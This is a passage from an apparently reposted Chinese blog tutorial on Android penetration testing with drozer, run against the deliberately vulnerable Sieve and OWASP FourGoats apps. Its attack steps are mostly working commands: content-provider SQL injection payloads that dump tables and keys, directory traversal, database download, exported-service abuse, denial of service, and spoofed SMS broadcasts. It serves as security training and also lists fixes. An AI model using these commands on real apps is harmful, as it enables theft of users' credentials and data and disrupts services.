（1）獲取service詳情：run app.service.info -a com.mwr.example.sieve

? ? ? ? ?不使用drozer啟動(dòng) service：am startservice –n 包名/service名

（2）權(quán)限提升：run app.service.start --action com.test.vulnerability.SEND_SMS --extra string dest 11111 --extra string text 1111 --extra string OP SEND_SMS

越權(quán)漏洞--繞過(guò)登錄界面導(dǎo)致可直接訪問(wèn)Your Passwords界面，說(shuō)明存在越權(quán)漏洞。

run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

Content Provider

內(nèi)容提供器(Content Provider) 為存儲(chǔ)和獲取數(shù)據(jù)提供統(tǒng)一的接口。可以在不同的應(yīng)用程序之間共享數(shù)據(jù)。把一個(gè)應(yīng)用程序指定的數(shù)據(jù)集提供給其他應(yīng)用程序。這些數(shù)據(jù)可以存儲(chǔ)在文件系統(tǒng)中、在一個(gè)SQLite數(shù)據(jù)庫(kù)、或以任何其他合理的方式。其他應(yīng)用可以通過(guò)ContentResolver類從該內(nèi)容提供者中獲取或存入數(shù)據(jù)。只有需要在多個(gè)應(yīng)用程序間共享數(shù)據(jù)是才需要內(nèi)容提供者。

Content Provider組件中存在以下常見(jiàn)的漏洞：

1. 讀寫權(quán)限漏洞Content Provider中通常都含有大量有價(jià)值的信息，比如用的電話號(hào)碼或者社交帳號(hào)登錄口令，而確認(rèn)一個(gè)content provider是否有能被攻擊的漏洞的最好的辦法，就是嘗試攻擊它一下?？梢杂胐rozer來(lái)尋找一些不需要權(quán)限的contentprovider:dz> runapp.provider.info –permission null這條命令能列出所有不需要任何讀寫權(quán)限的Content Provider，然后找到相對(duì)應(yīng)的包，去訪問(wèn)給定包存放在它的Content Provider中的數(shù)據(jù)。如果一些 Content Provider 的 URI 不需要讀權(quán)限，那就可以通過(guò)drozer工具提取其中的數(shù)據(jù)。在某些情況下，設(shè)置和執(zhí)行讀寫權(quán)限不當(dāng)，也會(huì)將ContentProvider中的數(shù)據(jù)暴露給攻擊者。除了提取數(shù)據(jù)，對(duì)于寫權(quán)限管理不當(dāng)?shù)腃ontent Provider還可以向其中寫入數(shù)據(jù)，使得攻擊者可以將惡意數(shù)據(jù)插入到數(shù)據(jù)庫(kù)中。
2. Content Provider中的SQL注入漏洞和Web漏洞類似，安卓APP也要使用數(shù)據(jù)庫(kù)，那就也有可能存在SQL注入漏洞。主要有兩類，第一類是SQL語(yǔ)句中的查詢條件子語(yǔ)句是可注入的，第二類是投影操作子句是可注入的。使用drozer可以很容易的找出查詢條件子句可注入的content provider。dz> runapp.provider.query [URI] –selection “1=1”也可以使用其他恒為真的值，例如“1-1=0”，“0=0”等等。如果APP存在SQL注入漏洞，那么輸入這行指令后就會(huì)返回?cái)?shù)據(jù)庫(kù)中的整張表。
3. Provider文件目錄遍歷漏洞當(dāng)Provider被導(dǎo)出且覆寫了openFile方法時(shí)，沒(méi)有對(duì)Content Query Uri進(jìn)行有效判斷或過(guò)濾。攻擊者可以利用openFile()接口進(jìn)行文件目錄遍歷以達(dá)到訪問(wèn)任意可讀文件的目的。

執(zhí)行命令 run app.provider.info -a com.mwr.example.sieve? 可以獲取Content Providers詳細(xì)信息：

從返回結(jié)果可以看出，對(duì) sieve 應(yīng)用的 DBContentProvider 內(nèi)容提供器的訪問(wèn)除了/Keys 路徑，其他的都不需要權(quán)限；而對(duì) FileBackupProvider 內(nèi)容提供器的訪問(wèn)則不需要任何權(quán)限，那么我們就可以從中獲取敏感數(shù)據(jù)。

目錄 URI 必須以 "content://"?開(kāi)頭，所以可以嘗試重構(gòu)部分目錄URI來(lái)進(jìn)入DBContentProvider。drozer 提供一個(gè)掃描模塊來(lái)猜測(cè)并驗(yàn)證一系列可以使用的目錄URI。執(zhí)行命令 run scanner.provider.finduris -a com.mwr.example.sieve（-a 指定應(yīng)用名稱，不加參數(shù)會(huì)掃描手機(jī)安裝的所有app）：

可以看到有三個(gè)URI 可以訪問(wèn)，考慮 /Keys 需要權(quán)限，所以可以使用content://com.mwr.example.sieve.DBContentProvider/Passwords/ 來(lái)測(cè)試。

信息泄露，獲取敏感數(shù)據(jù)

掃描并獲取Content Provider信息，并列出了可訪問(wèn)內(nèi)容URI的列表和路徑：run scanner.provider.finduris -a com.mwr.example.sieve

查詢或修改數(shù)據(jù)庫(kù)中的數(shù)據(jù)，發(fā)現(xiàn)存在數(shù)據(jù)泄露問(wèn)題，訪問(wèn)uri可看到一些敏感信息。執(zhí)行命令 run app.provider.query uri，可從不需要權(quán)限的內(nèi)容提供器中讀取敏感數(shù)據(jù)：

SQL 注入

content可能導(dǎo)致注入問(wèn)題。andorid 應(yīng)用大多使用sqlite數(shù)據(jù)庫(kù)存儲(chǔ)數(shù)據(jù)，sqlite?又使用 sql?操作數(shù)據(jù)，那么就有可能存在sql注入漏洞。使用參數(shù) "projection、seleciton" 可以傳遞一些簡(jiǎn)單的SQL注入語(yǔ)句到Contentprovider。下面通過(guò)簡(jiǎn)單的方法測(cè)試是否存在該漏洞。

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "'"
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--selection "'"

報(bào)錯(cuò)了，說(shuō)明應(yīng)該是存在SQL注入的，報(bào)錯(cuò)信息告訴我們整個(gè)查詢是如何執(zhí)行的。現(xiàn)在可以完整地攻擊這個(gè)漏洞，來(lái)列出數(shù)據(jù)庫(kù)中的所有表。類似于sqlmap，借助 Drozer 還可以進(jìn)一步查看都有哪些表，并且可以查詢表中的數(shù)據(jù)。

首先查詢存在哪些表：run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

接著查詢表中的數(shù)據(jù)：run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

結(jié)果如下圖所示：

最后，也可以使用掃描功能對(duì)該app注入點(diǎn)位置進(jìn)行自動(dòng)掃描
run scanner.provider.injection -a com.mwr.example.sieve
run scanner.provider.traversal -a com.mwr.example.sieve

列出該app的表信息：run scanner.provider.sqltables -a ?com.mwr.example.sieve

文件 操作

前面測(cè)試了存在注入的 URI，由于 provider 還提供文件訪問(wèn)，于是可以探測(cè)目錄穿越

File System-backedContent Provider 提供了訪問(wèn)底層文件系統(tǒng)的方法，Android 沙盒會(huì)阻止App共享文件，而 FileSystem-backed Content Provider 允許App共享文件。

對(duì)于sieve來(lái)說(shuō)，我們可以推測(cè)出的FileBackupProvider就是一個(gè)filesystem-backed content provider。這個(gè)路徑代表了我們想要打開(kāi)的文件的位置。因此我們可以猜測(cè)它的目錄URIs，并且使用drozer的app.provider.read模塊查看某個(gè)文件。執(zhí)行以下命令可對(duì)底層文件進(jìn)行讀?。?/p>

contentprovider存在SQL注入和目錄遍歷的風(fēng)險(xiǎn)。Drozer提供模塊來(lái)自動(dòng)測(cè)試這些類型的漏洞。

文件下載：run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data

目錄遍歷漏洞： run scanner.provider.traversal -a com.mwr.example.sieve

注入?檢測(cè)

目錄遍歷漏洞檢測(cè)：

下載文件 run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db C:\\database.db

列出指定文件路徑里全局可寫/可讀的文件
run scanner.misc.writablefiles --privileged /data/data/com.sina.weibo
run scanner.misc.readablefiles --privileged /data/data/com.sina.weibo
run app.broadcast.send --component 包名 --action android.intent.action.XXX

至此幾乎完全攻陷了sieve，提取出了用戶的密碼、pin，密文，也發(fā)現(xiàn)并利用了很多典型的漏洞，比如SQL注入、目錄遍歷等。電商關(guān)注的是業(yè)務(wù)邏輯漏洞、越權(quán)。具體的就是價(jià)格篡改、訂單便利、客戶敏感信息泄露等等漏洞，并描述漏洞測(cè)試方法及測(cè)試點(diǎn)有哪些。

Service 提權(quán)

Service 作為 Android 四大組件之一，具有和Activity一樣重要的級(jí)別，運(yùn)行于后臺(tái)的服務(wù)沒(méi)有界面。其他應(yīng)用組件能夠啟動(dòng)Service，并且當(dāng)用戶切換到另外的應(yīng)用場(chǎng)景，Service將持續(xù)在后臺(tái)運(yùn)行。另外，一個(gè)組件能夠綁定到一個(gè)service與之交互（IPC機(jī)制），例如，一個(gè)service可能會(huì)處理網(wǎng)絡(luò)操作，播放音樂(lè)，操作文件I/O或者與內(nèi)容提供者（content provider）交互，所有這些活動(dòng)都是在后臺(tái)進(jìn)行。從表面上看service并不具備危害性，但實(shí)際上service可以在后臺(tái)執(zhí)行一些敏感的操作。

Service存在的安全漏洞包括：權(quán)限提升，拒絕服務(wù)攻擊。沒(méi)有聲明任何權(quán)限的應(yīng)用即可在沒(méi)有任何提示的情況下啟動(dòng)該服務(wù)，完成該服務(wù)所作操作，對(duì)系統(tǒng)安全性產(chǎn)生極大影響。

以下示例如何借助可導(dǎo)出的Service組件進(jìn)行權(quán)限提升，演示過(guò)程基于另一個(gè)漏洞Demo APP，下載地址：OWASP GoatDroid-?FourGoats?Android App.apk，安裝后主頁(yè)面如下：

使用 jadx-gui 反編譯?APK?文件并查看源碼：

發(fā)現(xiàn) org.owasp.fourgoats.goatdroid.LocationService 服務(wù)可被導(dǎo)出且不需要任何權(quán)限，這意味著任何與?FourGoats?應(yīng)用程序安裝在統(tǒng)一設(shè)備上的惡意應(yīng)用程序可以訪問(wèn)該設(shè)備的位置，這是非常危險(xiǎn)的。使用 Drozer 確定下該APP的攻擊面：

接著可以使用以下命令，調(diào)用內(nèi)部服務(wù)組件：

查看services信息：run app.service.info -a org.owasp.goatdroid.fourgoats

啟動(dòng)相關(guān)服務(wù)用法：run app.service.start --action 服務(wù)名 --component 包名 服務(wù)名

示例：run app.service.start --action org.owasp.goatdroid.fourgoats.services.LocationService --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService

直接執(zhí)行造成拒絕服務(wù)：run app.service.start --action org.owasp.goatdroid.fourgoats.services.LocationService

執(zhí)行以下命令，觀察狀態(tài)欄中的位置標(biāo)志和 GPS 位置正在由?FourGoats?應(yīng)用程序訪問(wèn)：

Broadcast Receive

Broadcast Receive 廣播接收器：應(yīng)用可以使用它對(duì)外部事件進(jìn)行過(guò)濾只對(duì)感興趣的外部事件（如當(dāng)電話呼入時(shí)，或者數(shù)據(jù)網(wǎng)絡(luò)可用時(shí)）進(jìn)行接收并做出響應(yīng)。廣播接收器沒(méi)有用戶界面，然而它們可以啟動(dòng)一個(gè) Activity 或 Serice 來(lái)響應(yīng)它們收到的信息，或者用 NotificationManager 來(lái)通知用戶。通知可以用很多種方式來(lái)吸引用戶的注意力──閃動(dòng)背燈、震動(dòng)、播放聲音等。一般來(lái)說(shuō)是在狀態(tài)欄上放一個(gè)持久的圖標(biāo)，用戶可以打開(kāi)它并獲取消息。

當(dāng)應(yīng)用廣播接收器默認(rèn)設(shè)置exported='true'，導(dǎo)致應(yīng)用可能接收到第三方惡意應(yīng)用偽造的廣播，利用這一漏洞，攻擊者可以在用戶手機(jī)通知欄上推送任意消息，通過(guò)配合其它漏洞盜取本地隱私文件和執(zhí)行任意代碼。Android 可以在配置文件中聲明一個(gè)receiver或者動(dòng)態(tài)注冊(cè)一個(gè)receiver來(lái)接收廣播信息，攻擊者假冒APP構(gòu)造廣播發(fā)送給被攻擊的receiver，是被攻擊的APP執(zhí)行某些敏感行為或者返回敏感信息等，如果receiver接收到有害的數(shù)據(jù)或者命令時(shí)可能泄露數(shù)據(jù)或者做一些不當(dāng)?shù)牟僮?，?huì)造成用戶的信息泄漏甚至是財(cái)產(chǎn)損失。

1.查看暴露的廣播組件信息：

? ? ? ? run app.broadcast.info -a com.package.name　　獲取broadcast receivers信息

? ? ? ? run app.broadcast.send --component 包名 --action android.intent.action.XXX

2.嘗試拒絕服務(wù)攻擊檢測(cè)，向廣播組件發(fā)送不完整intent（空action或空extras）：

? ? ? ? run app.broadcast.send 通過(guò) intent 發(fā)送 broadcast receiver

? ? ? ? 空action：

? ? ? ? ? ? ? ? run app.broadcast.send --component 包名 ReceiverName

? ? ? ? ? ? ? ? run app.broadcast.send --component 包名 ReceiverName

? ? ? ? 空extras：

? ? ? ? ? ? ? ? run app.broadcast.send --action android.intent.action.XXX

下面使用?fourgoats.apk?測(cè)試廣播接收器組件，查看?fourgoats?該 APP 的可攻擊點(diǎn)，可以看到存在 廣播問(wèn)題，進(jìn)一步查看對(duì)外的 broadcast 組件信息：

由于運(yùn)行 broadcast 組件需要找到對(duì)應(yīng)的 action，所以需要反編譯 app，查看反編譯出的 AndroidManifest.xml 文件，可看到 receiver 的 exported 設(shè)置未進(jìn)行設(shè)置，說(shuō)明存在越權(quán)問(wèn)題，可發(fā)送惡意廣播，偽造消息等。

進(jìn)一步查看源代碼，發(fā)現(xiàn)需要兩個(gè)參數(shù) phoneNumber 和 message：

拒絕服務(wù)攻擊

輸入命令：run app.broadcast.send --action <action>?，嘗試拒絕服務(wù)攻擊檢測(cè)，向廣播組件發(fā)送不完整 intent 使用空 extras，可看到應(yīng)用停止運(yùn)行：

發(fā)送惡意廣播

發(fā)現(xiàn)利用該漏洞可發(fā)送惡意廣播包：run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --extra string phoneNumber 1234 --extra string message pwnd!

如下圖所示：

總結(jié)

• 1、當(dāng)組件為私有組件時(shí)，建議設(shè)置 exported 的值為 false（exported查找方法，搜索 android:exported）；
• 2、當(dāng)組件為公有組件時(shí)，建議對(duì)其進(jìn)行權(quán)限控制。

獲取手機(jī)交互shell

shell.start? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?獲取手機(jī)交互shell

上傳/下載文件到設(shè)備

tools.file.upload / tools.file.download? ? ? ? ?上傳/下載文件到設(shè)備

安裝二進(jìn)制文件到設(shè)備

tools.setup.busybox / tools.setup.minimalsu? ? ? ? 安裝可用的二進(jìn)制文件

攻防世界--mobile高手進(jìn)階區(qū)“基礎(chǔ)Android”逆向過(guò)程，三種方法，附文件

：https://www.52pojie.cn/thread-1632193-1-1.html

?文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-852882.html

到了這里，關(guān)于安裝 Kali NetHunter (完整版、精簡(jiǎn)版、非root版)、實(shí)戰(zhàn)指南、ARM設(shè)備武器化指南、andrax、安卓滲透drozer的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！